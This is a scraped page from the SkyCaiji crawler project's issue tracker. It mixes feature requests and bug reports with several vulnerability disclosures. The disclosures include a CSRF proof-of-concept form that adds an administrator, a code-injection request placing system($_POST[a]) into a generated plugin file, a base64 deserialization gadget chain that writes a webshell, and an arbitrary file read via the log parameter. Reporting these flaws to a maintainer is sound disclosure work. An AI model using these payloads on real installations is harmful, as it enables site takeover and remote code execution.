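zorlan / skycaiji
SkyCaiji (蓝天采集器) is a free, open-source crawler system. You collect data simply by pointing and clicking to edit rules. It runs locally, on shared hosting, or on a cloud server, can scrape almost any type of web page, integrates seamlessly with all kinds of CMS site builders, publishes data in real time without logging in, and runs fully automatically with no manual intervention. It is a fully cross-platform, cloud-based crawler system for large-scale web data collection.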
Home Page: https://www.skycaiji.com
License: Other
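Description:
The add-user page in the admin backend neither validates the Referer header nor uses a token, so an attacker can craft a form to carry out a CSRF attack.
Vulnerability type:
CSRF
Attack vector:
1. The attacker builds a form at a.com/csrf.html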
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://192.168.197.25/skycaiji/index.php?m=admin&c=user&a=add" method="POST">
<input type="hidden" name="groupid" value="2" />
<input type="hidden" name="username" value="demo" />
<input type="hidden" name="password" value="demo123" />
<input type="hidden" name="repassword" value="demo123" />
<input type="hidden" name="email" value="admin@admin.com" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
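2. The site administrator visits the attacker's page, a.com/csrf.html, and an administrator account is added.
Impact:
As soon as a logged-in administrator loads this page, a new site administrator account is created for the attacker.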
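The missing token check described in this report can be sketched as follows. This is a minimal, language-neutral illustration in Python, not the project's PHP code: the names `SERVER_SECRET`, `issue_csrf_token`, `is_valid_csrf_token`, `handle_add_user`, and the form field `csrf_token` are all hypothetical. It assumes the server derives a per-session token and refuses any state-changing request that does not carry it.

```python
import hashlib
import hmac
import secrets

# Hypothetical server-side secret; a real deployment would load it from configuration.
SERVER_SECRET = secrets.token_bytes(32)


def issue_csrf_token(session_id: str) -> str:
    """Derive a token bound to the session, to be embedded in the add-user form."""
    digest = hmac.new(SERVER_SECRET, session_id.encode("utf-8"), hashlib.sha256)
    return digest.hexdigest()


def is_valid_csrf_token(session_id: str, submitted: str) -> bool:
    """Compare the submitted token in constant time; a missing token always fails."""
    if not submitted:
        return False
    expected = issue_csrf_token(session_id)
    return hmac.compare_digest(expected.encode("utf-8"), submitted.encode("utf-8"))


def handle_add_user(session_id: str, form: dict) -> str:
    """Reject the state-changing request unless it carries the session's token."""
    if not is_valid_csrf_token(session_id, form.get("csrf_token", "")):
        return "rejected"
    # The real handler would create the account here.
    return "user added"
```

A form hosted on another origin cannot read the token, so a forged POST like the one in the proof of concept would take the "rejected" branch under these assumptions.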
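Hello zorlan,
I have two questions:
1. I collected url as a separate field. When publishing, how do I merge the url with the collected content so that they are published together?
2. During collection I captured images into content, but when I publish remotely to another VPS the images are not published. I merged the images and the text into content using |, yet only the text is published. (The image preview is visible during testing.)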
Location: /SkycaijiApp/admin/controller/Develop.php#L707#funcAction()
Code:
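...
else{
    // Read the user-supplied form fields
    $module=input('module');
    $copyright=input('copyright');
    $identifier=input('identifier');
    $name=input('name');
    $methods=input('methods/a',array());
    if(empty($module)){
        $this->error('请选择类型'); // "Please select a type"
    }
    // Normalize and validate module, identifier and copyright; $name gets no such check in this excerpt
    $module=$mfuncApp->format_module($module);
    $copyright=$mfuncApp->format_copyright($copyright);
    $identifier=$mfuncApp->format_identifier($identifier);
    if(!$mfuncApp->right_module($module)){
        $this->error('类型错误'); // "Invalid type"
    }
    if(!$mfuncApp->right_identifier($identifier)){
        $this->error('功能标识只能由字母或数字组成,且首个字符必须是字母!'); // "The function identifier may contain only letters or digits and must start with a letter"
    }
    if(!$mfuncApp->right_copyright($copyright)){
        $this->error('作者版权只能由字母或数字组成,且首个字符必须是字母!'); // "The author copyright may contain only letters or digits and must start with a letter"
    }
    // Keep only the entries whose method name passes the identifier pattern
    $newMethods=array();
    foreach ($methods['method'] as $k=>$v){
        if(preg_match('/^[a-z\_]\w*/',$v)){
            foreach ($methods as $mk=>$mv){
                $newMethods[$mk][$k]=$mv[$k];
            }
        }
    }
    $methods=$newMethods;
    unset($newMethods);
    if(empty($methods['method'])){
        $this->error('请添加方法!'); // "Please add a method"
    }
    // Build the app name and generate the plugin file
    $app=$mfuncApp->app_name($copyright,$identifier);
    $id=$mfuncApp->createApp($module,$app,array('name'=>$name,'methods'=>$methods));
    if($id>0){
        $this->success('创建成功','Develop/func?app='.$app); // "Created successfully"
    }else{
        $this->error('创建失败'); // "Creation failed"
    }
}
}
....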
Key vulnerable code:
$app=$mfuncApp->app_name($copyright,$identifier);
$id=$mfuncApp->createApp($module,$app,array('name'=>$name,'methods'=>$methods));
Following $mfuncApp->app_name:
it concatenates $copyright and $identifier directly and returns the result.
Back to $id=$mfuncApp->createApp($module,$app,array('name'=>$name,'methods'=>$methods));
Following $mfuncApp->createApp, which receives
$module,$app,array('name'=>$name,'methods'=>$methods)
All of these parameters are under our control. Following further:
$funcFile=$this->filename($module,$app);
This also returns the path directly after concatenation.
Back in the createApp function:
the $name variable is not filtered for /* and */, so it can close and reopen a comment in the file that is generated at
/plugin/func/$module/$copyright$identifier.php
The exploit request can therefore be constructed directly:
POST /index.php?s=/Admin/Develop/func HTTP/1.1
Host: 172.16.49.3:50004
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:98.0) Gecko/20100101 Firefox/98.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 179
Origin: http://172.16.49.3:50004
Connection: close
Referer: http://172.16.49.3:50004/index.php?s=/admin/Develop/func
Cookie: PHPSESSID=o7c4tlckirjijmciq20ivi0cv4; login_history=3%7C6a03060e5e6600124dab098dfed314df
_usertoken_=94701bbd27956c7d922c079da883c68f&module=downloadImg&name=*/system($_POST[a]);/*&identifier=a11&copyright=b1&methods%5Bmethod%5D%5B%5D=a12&methods%5Bcomment%5D%5B%5D=11
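One way to close the gap this report describes is to validate the display name before it is written into a generated source file. The sketch below is a language-neutral illustration in Python, not the project's PHP code. The functions `is_safe_plugin_name` and `render_plugin_header`, the 64-character limit, the allowed character set, and the header layout are all assumptions made for the example.

```python
def is_safe_plugin_name(name: str) -> bool:
    """Allow only letters, digits (including non-ASCII ones), spaces, '_' and '-'."""
    if not name or len(name) > 64:
        return False
    return all(ch.isalnum() or ch in " _-" for ch in name)


def render_plugin_header(name: str) -> str:
    """Build a comment header for a generated file (hypothetical layout).

    The name is validated first, so it cannot contain '*/' and close the comment.
    """
    if not is_safe_plugin_name(name):
        raise ValueError("plugin name contains characters that are not allowed")
    return "/*\n * Plugin name: " + name + "\n */"
```

An allow-list is used here instead of stripping `/*` and `*/`, because removing specific substrings is easy to bypass with nested or split sequences.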
After installing chromium and setting the path to /usr/bin/chromium, I get this message:
ERR: Display.cpp:993 (initialize): ANGLE Display::initialize error 12289: Could not open the default X display.
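Since you have already chosen to go open source, what is the point of scrambling the code formatting? Do you not want people to read it? An IDE can reformat it with one click anyway.
Some websites require login. Does the author have any plans to add support for this?
Could single-page scraping with a collection rule be split out into a standalone parsing API?
First try, and it works great. Based on the features I commonly use when scraping, I hope the following can be added:
I downloaded your code to learn from it and found that it has few comments. One slightly awkward question: why is the code minified? It is hard to read and not well suited to beginners who want to get started and learn. I would like to add comments to your code so that more people can understand it.
As per the title.
I have checked the CAPTCHA against the image repeatedly and it is not wrong.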
[ error ] [2]preg_match(): Compilation failed: missing closing parenthesis at offset 31
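Page rendering failed: Connection to 'ws://127.0.0.1/devtools/page/' failed: Server sent invalid upgrade response: HTTP/1.1 500 Internal Server Error Content-Length:19 Content-Type:text/html Please check [Rendering Settings]
Looking for a way to fix this.
Collector settings => result URL filter: multiple rules do not seem to be supported at the moment?
For example, I want to exclude URLs that contain /jobs/ and /cous/. Is there no way to configure that?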
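The multi-rule exclusion asked for here can be sketched as a simple "drop the URL if it contains any of the listed fragments" check. This is an illustration in Python of the requested behaviour, not a description of how the collector's filter works. The function names and the example.com URLs are hypothetical.

```python
from typing import Iterable, List


def is_url_allowed(url: str, excluded_fragments: Iterable[str]) -> bool:
    """Return False when the URL contains any of the excluded fragments."""
    return not any(fragment in url for fragment in excluded_fragments)


def filter_urls(urls: Iterable[str], excluded_fragments: List[str]) -> List[str]:
    """Keep only the URLs that match none of the exclusion rules."""
    return [url for url in urls if is_url_allowed(url, excluded_fragments)]


# Example with the two rules from the question (hypothetical URLs).
kept = filter_urls(
    [
        "https://example.com/news/1.html",
        "https://example.com/jobs/2.html",
        "https://example.com/cous/3.html",
    ],
    ["/jobs/", "/cous/"],
)
```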
System: macOS. The CAPTCHA fails to load properly in both Safari and Chrome.
I found a deserialization vulnerability in v2.5.1
URL: http://localhost/index.php?s=/admin/mystore/upload
The argument passed to unserialize can be controlled by uploading a file that contains the payload.
/*skycaiji-plugin-start*/TzoyNzoidGhpbmtccHJvY2Vzc1xwaXBlc1xXaW5kb3dzIjoxOntzOjM0OiIAdGhpbmtccHJvY2Vzc1xwaXBlc1xXaW5kb3dzAGZpbGVzIjthOjE6e2k6MDtPOjE3OiJ0aGlua1xtb2RlbFxQaXZvdCI6NDp7czo2OiJwYXJlbnQiO086MjA6InRoaW5rXGNvbnNvbGVcT3V0cHV0IjoyOntzOjI4OiIAdGhpbmtcY29uc29sZVxPdXRwdXQAaGFuZGxlIjtPOjMwOiJ0aGlua1xzZXNzaW9uXGRyaXZlclxNZW1jYWNoZWQiOjE6e3M6MTA6IgAqAGhhbmRsZXIiO086MjM6InRoaW5rXGNhY2hlXGRyaXZlclxGaWxlIjoyOntzOjEwOiIAKgBvcHRpb25zIjthOjU6e3M6NjoiZXhwaXJlIjtpOjM2MDA7czoxMjoiY2FjaGVfc3ViZGlyIjtiOjA7czo2OiJwcmVmaXgiO3M6MDoiIjtzOjQ6InBhdGgiO3M6NzQ6InBocDovL2ZpbHRlci93cml0ZT1zdHJpbmcucm90MTMvcmVzb3VyY2U9PD9jdWMgQHJpbnkoJF9UUkdbX10pOz8+Ly4uL2EucGhwIjtzOjEzOiJkYXRhX2NvbXByZXNzIjtiOjA7fXM6NjoiACoAdGFnIjtzOjM6InlsZyI7fX1zOjk6IgAqAHN0eWxlcyI7YToxOntpOjA7czo3OiJnZXRBdHRyIjt9fXM6OToiACoAYXBwZW5kIjthOjE6e2k6MDtzOjg6ImdldEVycm9yIjt9czo3OiIAKgBkYXRhIjthOjE6e2k6MDtzOjM6IjEyMyI7fXM6ODoiACoAZXJyb3IiO086Mjc6InRoaW5rXG1vZGVsXHJlbGF0aW9uXEhhc09uZSI6Mzp7czoxNToiACoAc2VsZlJlbGF0aW9uIjtpOjA7czo4OiIAKgBxdWVyeSI7TzoxNDoidGhpbmtcZGJcUXVlcnkiOjE6e3M6ODoiACoAbW9kZWwiO086MjA6InRoaW5rXGNvbnNvbGVcT3V0cHV0IjoyOntzOjI4OiIAdGhpbmtcY29uc29sZVxPdXRwdXQAaGFuZGxlIjtyOjU7czo5OiIAKgBzdHlsZXMiO2E6MTp7aTowO3M6NzoiZ2V0QXR0ciI7fX19czoxMToiACoAYmluZEF0dHIiO2E6MTp7aTowO3M6MzoiMTIzIjt9fX19fQ==/*skycaiji-plugin-end*/
This yields a webshell.
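A common mitigation for this class of bug is to stop deserializing objects from uploaded files and accept a data-only format instead. The sketch below is a language-neutral illustration in Python, not the project's PHP code. The start and end markers are taken from the payload above. Base64-encoded JSON is a swapped-in format assumed for the example, and `load_plugin_metadata` is a hypothetical name.

```python
import base64
import binascii
import json
import re

# Markers as they appear in the uploaded file shown in the report.
PLUGIN_BLOCK = re.compile(
    r"/\*skycaiji-plugin-start\*/(.*?)/\*skycaiji-plugin-end\*/", re.DOTALL
)


def load_plugin_metadata(file_text: str) -> dict:
    """Extract the plugin block and parse it as plain JSON data.

    JSON can only produce dicts, lists, strings, numbers, booleans and None,
    so no object constructors or magic methods run during parsing.
    """
    match = PLUGIN_BLOCK.search(file_text)
    if match is None:
        raise ValueError("no plugin block found")
    try:
        raw = base64.b64decode(match.group(1), validate=True)
        data = json.loads(raw.decode("utf-8"))
    except (binascii.Error, UnicodeDecodeError, json.JSONDecodeError) as exc:
        raise ValueError("plugin block is not valid base64-encoded JSON") from exc
    if not isinstance(data, dict):
        raise ValueError("plugin metadata must be a JSON object")
    return data
```

Under this assumption a serialized object graph such as the one in the report fails to parse and is rejected before any application code touches it.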
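What causes this?
After connecting to the database I had already bound the table -> database fields. After the database fields were updated, for example by adding new fields, the new fields cannot be found.
I cannot find where it is.
When hosted on a server, heavy scraping sometimes gets it throttled, whereas running locally is usually fine. I suggest bundling a tiny built-in web server.
Tools like BT Panel (宝塔) or phpStudy are not really suitable.
In simple mode, the page analysis feature does not load JS scripts, and there is a notice saying "WYSIWYG, all scripts have been filtered". Is that related?
Or does Chrome need some extra startup arguments?
Sometimes I need to crawl a given page in real time and return specific data. It would be great if an API mode and proxy support could be added.
For the fields in the Get Content field list, I suggest adding a check for whether the fetched content is empty, and skipping the item if it is.
I get this prompt while collecting and do not know what to do next. Has anyone run into the same problem?
Images on content pages can be downloaded, but images on related pages cannot; only the remote URL is obtained!
When scraping amazon.com, its default address is **, so the text is displayed in Chinese. After adding the corresponding modified cookie to the cookie cache data, the source fetched during collection is still in Chinese.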
I found an arbitrary file read vulnerability in V1.3,
in the error log module.
URL: http://localhost/index.php?m=admin&c=Tool&a=log&file=D%3A%5CphpStudy%5CWWW%5CSkycaijiApp%5CRuntime%5CLogs%5CAdmin%5C18_09_13.log
The file parameter can be controlled by the user; for example, it can be used to read index.php.
POC:
Suggestion: restrict the file parameter.
Info: V1.3
I hope you can fix it.
Best wishes!
Author: [email protected]
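The suggested restriction on the file parameter can be sketched as "resolve the requested name inside the log directory and refuse anything that ends up elsewhere". This is a language-neutral illustration in Python, not the project's PHP code. The function name `resolve_log_path`, the example directory, and the `.log` suffix rule are assumptions.

```python
from pathlib import Path


def resolve_log_path(log_dir: str, requested: str) -> Path:
    """Return the absolute path of a log file, or raise if it escapes log_dir.

    Resolving first collapses '..' segments and absolute paths, so the
    containment check is made on the real target, not on the raw input.
    """
    base = Path(log_dir).resolve()
    candidate = (base / requested).resolve()
    if candidate.suffix != ".log" or base not in candidate.parents:
        raise ValueError("requested file is outside the log directory")
    return candidate
```

With this check, a request for a dated log file inside the directory is accepted, while a request such as `../index.php` or an absolute path to another location is refused.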
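Why does it still say curl is not supported even though I installed php-curl? PHP 5.5, Ubuntu 14.04. I have tried restarting Apache and the server.
Please consider developing official local and remote publishing plugins for Joomla.
The rendering tool server is not running. Please check that the configuration is correct, then click Save once you have confirmed it.
Could you update the architecture diagram and design notes? I would like to study it in depth 🤞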
[ 2020-03-25T00:04:47+08:00 ] 132.232.164.158 GET <domain>/index.php?s=/Admin/Api/collect&backstage=1
[ error ] [8192]The each() function is deprecated. This message will be suppressed on further calls
[ error ] [2]getimagesize(<domain>/data/attachment/portal/201704/06/020952nkdg66cn1gfl16kd.jpg): failed to open stream: Connection timed out
[ error ] [2]getimagesize(<domain>/data/attachment/portal/201704/06/020935kmkghqccfjdkrjvv.jpg): failed to open stream: Connection timed out
[ error ] [2]getimagesize(<domain>/data/attachment/portal/201704/06/095225b7ly3cceehccfelf.jpeg): failed to open stream: Connection timed out
[ error ] [2]getimagesize(<domain>/data/attachment/portal/201704/06/104308tz4wci494tct2crw.jpg): failed to open stream: Connection timed out
[ error ] [2]getimagesize(<domain>/data/attachment/portal/201704/06/110353z3k53trt5nnk5nq3.png): failed to open stream: Connection timed out
[ error ] [2]getimagesize(http://<domain>/data/attachment/portal/201704/06/114136g1nl9ll1ll611lh6.jpg.thumb.jpg): failed to open stream: Connection timed out
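Converting from the 3.x version to 5.x is a bit of a hassle; all of our company's projects are written in TP5 (ThinkPHP 5).
Add a proxy pool:
The current fixed proxy IP setting has limited flexibility. I suggest allowing a proxy pool to be specified, with an IP picked at random from the pool.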
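The requested behaviour, picking a random proxy from a configured pool for each request, can be sketched as follows. This is an illustration in Python of the feature request, not existing collector functionality. The function name `pick_proxy` and the proxy addresses (taken from the 192.0.2.0/24 documentation range) are hypothetical.

```python
import random
from typing import Optional, Sequence


def pick_proxy(pool: Sequence[str], rng: Optional[random.Random] = None) -> Optional[str]:
    """Return one proxy chosen uniformly at random, or None for an empty pool.

    Passing a seeded random.Random makes the choice reproducible in tests.
    """
    if not pool:
        return None
    chooser = rng if rng is not None else random
    return chooser.choice(pool)


# Hypothetical pool; each request would call pick_proxy() again.
PROXY_POOL = ["192.0.2.10:8080", "192.0.2.11:8080", "192.0.2.12:8080"]
selected = pick_proxy(PROXY_POOL)
```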
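I suggest the maintainer consider upgrading to the TP5 core.
https://github.com/jae-jae/QueryList
It would be even more powerful if this query library could be integrated.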